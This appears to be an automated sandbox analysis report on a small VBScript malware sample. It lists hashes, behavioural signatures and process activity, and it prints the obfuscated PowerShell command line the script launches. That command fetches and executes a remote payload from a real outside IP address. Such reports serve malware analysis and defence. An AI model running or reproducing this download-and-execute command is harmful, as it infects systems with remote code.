Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
06-06-2023 18:26
Static task
static1
Behavioral task
behavioral1
Sample
f.vbs
Resource
win7-20230220-en
windows7-x64
5 signatures
150 seconds
General
-
Target
f.vbs
-
Size
346B
-
MD5
41e54b45d2ab4718156a2d978aeb2eaa
-
SHA1
b8f924f1fd50d3feba999029615ae6d2b47ecea7
-
SHA256
eac03f7bc83d42d686c55a12736a74086e1feada3ef4181f79c5435311a5358d
-
SHA512
96a51af6ebb69dc01971fef39a5e033417a02299080804a7062182f64be5b9c5ce0ac863397e34bfeca5a1b1c767883a4b6b3888e36e8f443ac0f1bb661e7727
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1932 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1932 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2044 wrote to memory of 1932 2044 WScript.exe powershell.exe PID 2044 wrote to memory of 1932 2044 WScript.exe powershell.exe PID 2044 wrote to memory of 1932 2044 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');Sleep 1;IeX($s3+$kds+$HJDRRRUY);2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1932-58-0x000000001B050000-0x000000001B332000-memory.dmpFilesize
2.9MB
-
memory/1932-59-0x0000000002410000-0x0000000002418000-memory.dmpFilesize
32KB
-
memory/1932-60-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/1932-62-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/1932-61-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/1932-63-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB